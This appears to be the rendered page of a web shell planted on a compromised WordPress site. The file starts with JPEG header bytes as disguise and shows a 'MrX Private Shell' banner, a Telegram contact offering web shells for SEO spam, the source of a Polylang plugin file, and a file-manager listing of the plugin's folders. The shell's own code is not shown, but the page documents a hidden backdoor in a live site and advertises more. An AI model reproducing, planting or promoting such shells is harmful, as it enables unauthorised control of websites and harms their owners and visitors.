����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Polylang
*/
/**
* Container for 3rd party plugins ( and themes ) integrations.
* This class is available as soon as the plugin is loaded.
*
* @since 1.0
* @since 2.8 Renamed from PLL_Plugins_Compat to PLL_Integrations.
*/
#[AllowDynamicProperties]
class PLL_Integrations {
/**
* Singleton instance.
*
* @var PLL_Integrations|null
*/
protected static $instance = null;
/**
* Constructor.
*
* @since 1.0
*/
protected function __construct() {}
/**
* Returns the single instance of the class.
*
* @since 1.7
*
* @return self
*/
public static function instance(): self {
if ( null === self::$instance ) {
self::$instance = new self();
self::$instance->init();
}
return self::$instance;
}
/**
* Requires integrations.
*
* @since 3.7
*
* @return void
*/
protected function init(): void {
$load_scripts = require __DIR__ . '/integration-build.php';
foreach ( $load_scripts as $load_script ) {
require_once __DIR__ . "/{$load_script}/load.php";
}
}
}
class_alias( 'PLL_Integrations', 'PLL_Plugins_Compat' ); // For Backward compatibility.
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| aqua-resizer | Folder | 0755 |
|
|
| cache | Folder | 0755 |
|
|
| custom-field-template | Folder | 0755 |
|
|
| domain-mapping | Folder | 0755 |
|
|
| duplicate-post | Folder | 0755 |
|
|
| jetpack | Folder | 0755 |
|
|
| no-category-base | Folder | 0755 |
|
|
| twenty-seventeen | Folder | 0755 |
|
|
| wp-importer | Folder | 0755 |
|
|
| wp-offload-media | Folder | 0755 |
|
|
| wp-sweep | Folder | 0755 |
|
|
| wpseo | Folder | 0755 |
|
|
| yarpp | Folder | 0755 |
|
|
| integration-build.php | File | 344 B | 0644 |
|
| integrations.php | File | 1.11 KB | 0644 |
|